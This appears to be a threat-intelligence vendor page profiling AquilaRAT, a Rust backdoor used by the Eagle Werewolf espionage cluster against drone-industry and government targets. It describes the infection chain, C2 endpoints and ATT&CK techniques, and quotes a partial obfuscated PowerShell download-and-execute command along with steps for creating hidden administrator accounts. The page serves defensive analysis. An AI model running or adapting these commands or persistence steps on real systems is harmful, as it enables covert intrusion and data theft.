AquilaRAT
AquilaRAT is a previously undocumented Rust-based remote access trojan/backdoor associated with the Eagle Werewolf cluster. It was observed in espionage-focused campaigns active since at least May 2023 and linked to activity detected in February 2026. Eagle Werewolf primarily targeted state/government organizations, industrial companies, and individuals involved in UAV/drone manufacturing and engineering, using Starlink registration and drone-themed lures distributed via phishing and compromised Telegram channels.
In the described intrusion chain, a Rust dropper disguised as a Starlink activation/checklist application decrypted and launched a Go dropper. The Go dropper unpacked components, created hidden local user accounts, attempted to add them to the Administrators group, prepared SSH tunnel configuration, and installed AquilaRAT as a Windows service named MicrosoftOfficeUpdate, using the binary MicrosoftOfficeUpdate.exe.
AquilaRAT communicates with infrastructure including updateserv[.]net and retrieves additional C2 addresses from servupdate[.]net/array/array9.json; configurationserv[.]com is also mentioned in related infrastructure. It generates a machine identifier from host hardware and system attributes, including computer name, BIOS serial number, system UUID, processor ID, and motherboard serial number, registers the victim with a /check endpoint, and polls /backup/get-time every 15 seconds. Reported tasking includes heartbeat/beaconing, command execution, file upload, and file scanning. The Cmd task executes PowerShell commands and uploads results to /cmd/upload-result. The Files task uploads files to the C2 in 5 MB chunks via /file/uploadChunk. The ScanFiles task enumerates files according to extensions, ignored substrings, and recursion depth, then sends metadata to /clients/files.
The malware was deployed alongside Go2Tunnel to support reverse SSH tunneling, providing the operators with persistent remote access in addition to AquilaRAT’s RAT functionality.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
MicrosoftOfficeUpdate.exe is a previously undocumented Rust RAT, which we named AquilaRAT.
Techniques & procedures
23 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniquesA separate espionage campaign linked to the Eagle Werewolf cluster used Iraqi hosting on Regxa infrastructure to deploy multiple remote access tools via phishing lures based on Starlink registration and drone training themes.
used Iraqi hosting on Regxa infrastructure to deploy multiple remote access tools via phishing lures based on Starlink registration and drone training themes.
Notably, in February 2026, it compromised one of the drone-focused Telegram channels to distribute malware.
Execution
4 techniquesrun-script.ps1, a PowerShell script to load and execute code via PowerShell. The file contains: powershell -w hidden -ep bypass -c "I''E''X...DOWNLOADDaTa(...)"
Cmd, performs the following actions: cmd /K chcp 65001 —sets the encoding chcp-65001, and then executes powershell <command>.
Upon execution, StarDebug_1.0.1.msi creates the directory %LOCALAPPDATA%\Star and extracts the following three files to it...
The URL hxxps://battleflight[.]org/download/installer hosted the executable BattleFlight-Install-v11.0.3.exe, a C# dropper disguised as an installer for a drone pilot training simulator.
Persistence
2 techniquesinst_u.ps1 ... проверяет существование УЗ $sshUserName и при необходимости создает ее... Далее выполняется попытка добавления новой УЗ во встроенную группу «Администраторы».
Privilege Escalation
1 techniqueStealth
6 techniquesThe appwiz.cpl applet is packed with UPX and obfuscated with Oreans Code Virtualizer.
The dropper contains the EchoGather payload, which is Base64-encoded and XOR-encrypted.
BattleFlight-Install-v11.0.3.exe, a C# dropper disguised as an installer for a drone pilot training simulator.
At the final stage of execution, the Rust dropper deletes the insider-[a-zA-Z0-9]{6} directory.
the C# dropper contains the EchoGather payload, which is Base64-encoded and XOR-encrypted.
скрипт добавляет настройку в реестре для сокрытия новой УЗ с экрана входа... UserList ... -Name $sshUserName -Value 0
Discovery
2 techniquesEchoGather performs anti-virtualization checks, gathers system information, uploads it to the C2 server...
ScanFiles ... The following fields are sent to the endpoint /clients/files: fileName relativePath fullPath fileSize createdDate modifiedDate
Collection
2 techniquesFiles, uploads a directory/file from the host to the C2 server.
The updater.exe executable is a Go dropper that unpacks embedded gzip archives and launches final stage loaders.
Command and Control
3 techniquesThe C2 server is queried every 15 seconds.
The loader then fetches the Node.js interpreter (if it is not present in the system) and the next stage obfuscated JS script.
Exfiltration
1 techniqueThe payload then enters an endless loop in which it connects to the C2 server, encodes the system information in Base64, and exfiltrates it via an HTTPS POST query.
IOCs tracked for this family
31 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A Rust-based backdoor used in the Eagle Werewolf campaign with rotating command-and-control domains.
Rust-based backdoor/RAT used in the campaign with multiple rotating C2 domains.
A previously undocumented Rust RAT used by Eagle Werewolf. It generates a machine ID from host hardware identifiers, retrieves additional C2 addresses, registers with the server, polls every 15 seconds, and executes JSON-defined tasks including heartbeat, file upload, command execution, and file scanning.
A previously undocumented Rust RAT installed as a service masquerading as Microsoft Office Update. It generates a machine ID, retrieves additional C2s, registers with the server, polls for JSON-formatted tasks, executes commands, scans files, and uploads data in chunks.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.